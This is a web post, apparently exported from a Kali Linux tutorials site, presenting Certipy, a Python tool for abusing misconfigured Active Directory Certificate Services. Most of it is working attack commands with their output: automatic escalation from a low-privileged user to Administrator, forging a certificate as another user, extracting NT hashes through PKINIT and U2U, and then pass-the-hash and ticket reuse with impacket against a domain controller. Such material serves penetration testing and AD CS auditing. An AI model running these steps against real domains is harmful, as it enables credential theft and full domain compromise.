{"id":20530,"date":"2021-11-29T15:30:04","date_gmt":"2021-11-29T15:30:04","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=20530"},"modified":"2021-11-29T15:30:08","modified_gmt":"2021-11-29T15:30:08","slug":"certipy","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/certipy\/","title":{"rendered":"Certipy : Python Implementation For Active Directory Certificate Abuse"},"content":{"rendered":"\n

Certipy<\/strong> is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).<\/p>\n\n\n\n

Based on the C# variant Certify from @harmj0y and @tifkin_.<\/p>\n\n\n\n

Installation<\/strong><\/p>\n\n\n\n

$ python3 setup.py install<\/strong><\/p>\n\n\n\n

Usage<\/strong><\/p>\n\n\n\n

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
target {find,req,auth,auto} \u2026
Active Directory certificate abuse
positional arguments:
target [[domain\/]username[:password]@]
{find,req,auth,auto} Action
find Find certificate templates
req Request a new certificate
auth Authenticate with a certificate
auto Automatically abuse certificate templates for privilege escalation
optional arguments:
-h, –help show this help message and exit
-debug Turn DEBUG output ON
-no-pass don’t ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
connection:
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
NetBIOS name and you cannot resolve it
-nameserver nameserver
Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH<\/strong><\/p>\n\n\n\n

Examples<\/strong><\/p>\n\n\n\n

<\/a>Auto<\/strong><\/p>\n\n\n\n

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator<\/strong><\/code> user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.<\/p>\n\n\n\n

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server<\/strong><\/code> has been copied to Copy of Web Server<\/strong><\/code>. The only change was that the EKU Server Authentication<\/strong><\/code> was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication<\/strong><\/code> EKU.<\/p>\n\n\n\n

In this example, the user john<\/strong><\/code> is a low privileged user who is allowed to enroll for the Copy of Web Server<\/strong><\/code> template.<\/p>\n\n\n\n

$ certipy ‘predator\/john:Passw0rd@dc.predator.local’ auto
[] Trying template ‘Copy of Web Server’ with CA ‘predator-DC-CA’ [<\/em>] Generating RSA key
[] Requesting certificate [<\/em>] Request success
[] Got certificate with UPN ‘Administrator’ [<\/em>] Saved certificate to ‘1.crt’
[] Saved private key to ‘1.key’ [<\/em>] Using UPN: ‘Administrator@predator’
[] Trying to get TGT\u2026 [<\/em>] Saved credential cache to ‘Administrator.ccache’
[] Trying to retrieve NT hash for ‘Administrator@predator’ [<\/em>] Got NT hash for ‘Administrator@predator’: fc525c9683e8fe067095ba2ddc971889<\/strong><\/p>\n\n\n\n

By default, the user Administrator<\/strong><\/code> is chosen. Use the -user<\/strong><\/code> parameter to create a certificate for another user.<\/p>\n\n\n\n

<\/a>Find<\/strong><\/p>\n\n\n\n

The find<\/code> action will find certificate templates that are enabled by one or more CAs.<\/p>\n\n\n\n

<\/a>Find vulnerable templates<\/strong><\/p>\n\n\n\n

Use the -vulnerable<\/code> <\/strong>parameter to only find vulnerable certificate templates.<\/p>\n\n\n\n

$ certipy ‘predator\/john:Passw0rd@dc.predator.local’ find -vulnerable
[*] Finding vulnerable certificate templates for ‘john’
User
Name : predator\\john
Groups :
Certificate Authorities
0
CA Name : predator-DC-CA
DNS Name : dc.predator.local
Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local
Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D
Certificate Validity Start : 2021-10-06 11:32:01+00:00
Certificate Validity End : 2026-10-06 11:42:01+00:00
User Specified SAN : Disabled
CA Permissions
Owner : BUILTIN\\Administrator
Access Rights
ManageCertificates : BUILTIN\\Administrator
predator\\Domain Admins
predator\\Enterprise Admins
ManageCa : BUILTIN\\Administrator
predator\\Domain Admins
predator\\Enterprise Admins
Enroll : Authenticated Users
Vulnerable Certificate Templates
0
CAs : predator-DC-CA
Template Name : Copy of Web Server
Validity Period : 2 years
Renewal Period : 6 weeks
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Authorized Signatures Required : 0
Extended Key Usage :
Permissions
Enrollment Permissions
Enrollment Rights : predator\\Domain Admins
predator\\Enterprise Admins
Authenticated Users
Object Control Permissions
Owner : predator\\Administrator
Write Owner Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator
Write Dacl Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator
Write Property Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator
Vulnerable Reasons : ‘Authenticated Users’ can enroll, enrollee supplies subject and template allows authentication
‘Authenticated Users’ can enroll and template has dangerous EKU<\/strong><\/p>\n\n\n\n

Use the -user<\/strong><\/code> parameter to find vulnerable certificate templates for another user. By default, the current user will be used.<\/p>\n\n\n\n

<\/a>Find all templates<\/strong><\/p>\n\n\n\n

$ certipy ‘predator\/john:Passw0rd@dc.predator.local’ find
[*] Finding certificate templates for ‘john’
User
Name : predator\\john
Groups :
Certificate Authorities
0
CA Name : predator-DC-CA
DNS Name : dc.predator.local
Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local
Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D
Certificate Validity Start : 2021-10-06 11:32:01+00:00
Certificate Validity End : 2026-10-06 11:42:01+00:00
User Specified SAN : Disabled
CA Permissions
Owner : BUILTIN\\Administrator
Access Rights
ManageCertificates : BUILTIN\\Administrator
predator\\Domain Admins
predator\\Enterprise Admins
ManageCa : BUILTIN\\Administrator
predator\\Domain Admins
predator\\Enterprise Admins
Enroll : Authenticated Users
Certificate Templates
0
CAs : predator-DC-CA
Template Name : User
Validity Period : 1 year
Renewal Period : 6 weeks
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectRequireEmail
SubjectAltRequireEmail
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
PublishToDs
IncludeSymmetricAlgorithms
Authorized Signatures Required : 0
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : predator\\Domain Admins
predator\\Domain Users
predator\\Enterprise Admins
Object Control Permissions
Owner : predator\\Enterprise Admins
Write Owner Principals : predator\\Domain Admins
predator\\Enterprise Admins
Write Dacl Principals : predator\\Domain Admins
predator\\Enterprise Admins
Write Property Principals : predator\\Domain Admins
predator\\Enterprise Admins
[\u2026]
11
CAs : predator-DC-CA
Template Name : Copy of Web Server
Validity Period : 2 years
Renewal Period : 6 weeks
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Authorized Signatures Required : 0
Extended Key Usage :
Permissions
Enrollment Permissions
Enrollment Rights : predator\\Domain Admins
predator\\Enterprise Admins
Authenticated Users
Object Control Permissions
Owner : predator\\Administrator
Write Owner Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator
Write Dacl Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator
Write Property Principals : predator\\Domain Admins
predator\\Enterprise Admins
predator\\Administrator<\/strong><\/p>\n\n\n\n

Request<\/strong><\/p>\n\n\n\n

Request a new certificate from a certificate template. By default, the current user specified in the target<\/strong><\/code> parameter will be used.<\/p>\n\n\n\n

<\/a>Request as another user<\/strong><\/p>\n\n\n\n

To request a certificate as another user, use the -alt<\/strong><\/code> parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN<\/strong><\/code> is set to Enabled<\/strong><\/code>.<\/p>\n\n\n\n

In this example, the user john<\/strong><\/code> is a low privileged user. The certificate template Copy of Web Server<\/strong><\/code> is a copy of the default Web<\/strong> Server<\/strong><\/code> template. The EKU Server Authentication<\/strong><\/code> was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server<\/em><\/code> template allows the enrollee to supply the subject.<\/p>\n\n\n\n

john<\/strong><\/code> will request a certificate valid for authentication as jane<\/strong><\/code>. The CA predator-DC-CA<\/strong><\/code> has Copy of Web Server<\/strong><\/code> enabled.<\/p>\n\n\n\n

$ certipy ‘predator\/john:Passw0rd@dc.predator.local’ req -template ‘Copy of Web Server’ -ca ‘predator-DC-CA’ -alt ‘jane’
[] Generating RSA key [<\/em>] Requesting certificate
[] Request success [<\/em>] Got certificate with UPN ‘jane’
[] Saved certificate to ‘2.crt’ [<\/em>] Saved private key to ‘2.key’<\/strong><\/p>\n\n\n\n

The certificate and key will be DER encoded and saved to <request ID>.(crt|key)<\/strong><\/code>, where request ID<\/strong><\/code> is returned by the server.<\/p>\n\n\n\n

<\/a>Request as self<\/strong><\/p>\n\n\n\n

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default Use<\/strong>r<\/code> template.<\/p>\n\n\n\n

$ certipy ‘predator\/john:Passw0rd@dc.predator.local’ req -template ‘User’ -ca ‘predator-DC-CA’
[] Generating RSA key [<\/em>] Requesting certificate
[] Request success [<\/em>] Got certificate with UPN ‘john@predator.local’
[] Saved certificate to ‘3.crt’ [<\/em>] Saved private key to ‘3.key’<\/strong><\/p>\n\n\n\n

Authenticate<\/strong><\/p>\n\n\n\n

The auth<\/code> action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the target<\/strong><\/code> parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to <username>.ccach<\/strong>e<\/code>.<\/p>\n\n\n\n

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.<\/p>\n\n\n\n

$ certipy ‘predator\/jane@dc.predator.local’ auth -cert .\/2.crt -key .\/2.key
[] Using UPN: ‘jane@predator’ [<\/em>] Trying to get TGT\u2026
[] Saved credential cache to ‘jane.ccache’ [<\/em>] Trying to retrieve NT hash for ‘jane@predator’
[*] Got NT hash for ‘jane@predator’: 077cccc23f8ab7031726a3b70c694a49<\/strong><\/p>\n\n\n\n

Using the NT hash<\/strong><\/p>\n\n\n\n

You can simply pass-the-hash (PTH) for many services. For instance SMB:<\/p>\n\n\n\n

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 ‘predator.local\/administrator@dc.predator.local’
Impacket v0.9.23 – Copyright 2021 SecureAuth Corporation
Type help for list of commands
who
host: \\172.16.19.1, user: administrator, active: 1, idle: 0<\/strong><\/p>\n\n\n\n

Using the credential cache<\/strong><\/p>\n\n\n\n

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs<\/strong><\/code> (SMB) service at dc.predator.local<\/strong><\/code>:<\/p>\n\n\n\n

$ # use TGT from Certipy
$ export KRB5CCNAME=.\/Administrator.ccache
$ # request TGS
$ impacket-getST -spn ‘cifs\/dc.predator.local’ -dc-ip 172.16.19.100 -no-pass -k ‘predator\/administrator’
$ # use TGS from impacket-getST
$ export KRB5CCNAME=.\/administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass ‘predator.local\/administrator@dc.predator.local’
Impacket v0.9.23 – Copyright 2021 SecureAuth Corporation
Type help for list of commands
#who
host: \\172.16.19.1, user: Administrator, active: 1, idle: 0<\/strong><\/p>\n\n\n\n

Note<\/strong> that impacket-getST<\/code> will overwrite the credential cache at <username>.ccache<\/code>. Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST<\/code>.<\/p>\n\n\n\n

\n
Download<\/strong><\/a><\/div>\n<\/div>\n\n\n\n

<\/p>\n","protected":false},"excerpt":{"rendered":"

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). Based on the C# variant Certify from @harmj0y and @tifkin_. Installation $ python3 setup.py install Usage $ certipy -husage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]target {find,req,auth,auto} \u2026Active Directory certificate abusepositional arguments:target [[domain\/]username[:password]@]{find,req,auth,auto} Actionfind […]<\/p>\n","protected":false},"author":4,"featured_media":20546,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[4483,4482,2676],"class_list":["post-20530","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-active-directory-certificate-abuse","tag-certipy","tag-python"],"yoast_head":"\nCertipy : Python Implementation For Active Directory Certificate Abuse<\/title>\n<meta name=\"description\" content=\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/certipy\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Certipy : Python Implementation For Active Directory Certificate Abuse\" \/>\n<meta property=\"og:description\" content=\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/certipy\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-29T15:30:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-29T15:30:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Certipy : Python Implementation For Active Directory Certificate Abuse\",\"datePublished\":\"2021-11-29T15:30:04+00:00\",\"dateModified\":\"2021-11-29T15:30:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\"},\"wordCount\":1455,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"keywords\":[\"Active Directory Certificate Abuse\",\"Certipy\",\"Python\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/certipy\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\",\"name\":\"Certipy : Python Implementation For Active Directory Certificate Abuse\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"datePublished\":\"2021-11-29T15:30:04+00:00\",\"dateModified\":\"2021-11-29T15:30:08+00:00\",\"description\":\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/certipy\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Certipy : Python Implementation For Active Directory Certificate Abuse","description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/certipy\/","og_locale":"en_US","og_type":"article","og_title":"Certipy : Python Implementation For Active Directory Certificate Abuse","og_description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","og_url":"https:\/\/kalilinuxtutorials.com\/certipy\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2021-11-29T15:30:04+00:00","article_modified_time":"2021-11-29T15:30:08+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Certipy : Python Implementation For Active Directory Certificate Abuse","datePublished":"2021-11-29T15:30:04+00:00","dateModified":"2021-11-29T15:30:08+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/"},"wordCount":1455,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","keywords":["Active Directory Certificate Abuse","Certipy","Python"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/certipy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/","url":"https:\/\/kalilinuxtutorials.com\/certipy\/","name":"Certipy : Python Implementation For Active Directory Certificate Abuse","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","datePublished":"2021-11-29T15:30:04+00:00","dateModified":"2021-11-29T15:30:08+00:00","description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/certipy\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R 